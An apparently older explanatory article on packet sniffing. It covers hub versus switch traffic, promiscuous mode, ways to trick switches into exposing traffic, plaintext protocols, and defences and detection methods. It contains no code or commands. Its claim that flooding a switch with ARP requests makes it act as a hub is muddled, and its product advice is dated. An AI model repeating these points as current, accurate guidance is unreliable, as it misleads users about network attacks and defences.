Basically to successfully sniff you have to be on a LAN that is connected with a hub and not a switch. Computers can be physically connected in many ways. If they are connected using a Hub then here is what happens. If there were 4 computers (A, B, C & D) and A wanted to send something to D then it goes through the hub. But the hub doesn't know where D is. So the hub "re-transmits" what A sent to all other computers. Computers B and C should ignore this data since the packet says it's for D. Computer D will obviously accept the data.

You can probably see the security issue here, since other computers nearly have direct access to data that's not meant for them. A packet sniffer can put your network card into promiscuous mode. In this mode the data not meant for that computer will silently pass through the system and thus allows for the packet sniffer to log data!

When computers are connected via a switch and not a hub then things are different. A switch actually knows which computers are connected to it. The switch also knows where the computers are. So when A sends something to D the data goes to the switch and it will send it directly to D without passing by B or C. So you cannot sniff data by installing a sniffer on computer B or C. Thus when functioning as intended a switch provides good sniffer protection!

Switches WON'T prevent sniffing - they make it harder


There is a super important point to understand with sniffing and "switches". Whilst switches appear to protect against sniffers THERE ARE WAYS to "trick" the switch which can enable you to start sniffing. You can flood the switch with ARP requests which will cause the switch to start behaving like a hub, or you can trick the switch to redirect traffic to the sniffer system.

How do I prevent my data being sniffed?

Many services on the internet send data in the plain text. By default POP mail, SMTP (for sending mail) send data in clear text. The same applies for FTP, Telnet and News clients. ICQ, MSN and AOL Instant messengers send passwords again in clear text. In fact most services send passwords this way.

Ways to secure yourself

   1. When logging into to mail services check to see if your mail client supports encrypted login's. The server has to  support this setting too, so check with them.
   2. Even if you login securely (above) any e-mail you send is still in clear text, anyone on the path that the mail travels through can technically read it. Use Encryption to encrypt the message. PGP (www.pgpi.org) is the popular application for this
   3. When shopping on-line make sure the store has a "secure" connection for submitting credit card details. Generally SSL 128bit encryption is the standard.
   4. Telnet sends password and normal data in plain text. If your server supports SSH then use this instead of Telnet since the connection is encrypted.


If possible use a Switch rather than a HUB on a LAN. This provides extremely efficient protection in practice (more work required to successfully sniff). This method is a frontline defence but it shouldn't be a method fully relied upon.

It's near impossible to detect that a packet sniffer is sniffing a connection. This is a passive act, the data is "logged" but unaltered. There are some methods of determining a packet sniffer, however they cannot conclude 100% what they found. A major clue that that sniffing MAY be taking place is the fact that many DNS lookup's are taking place. (i.e., the sniffer is attempting to convert IP addresses to host names) however this is only an indication for there may be other reasons as to why this may occur.

Another, stronger method of detecting if a packet sniffer is operating is to send an ARP request to the device in question to determine if it's in promiscuous mode. A packet which is not destined for your computer will be stopped at the hardware level if promiscuous mode is not on. The "device" in most cases is the network card of the computer running the sniffer.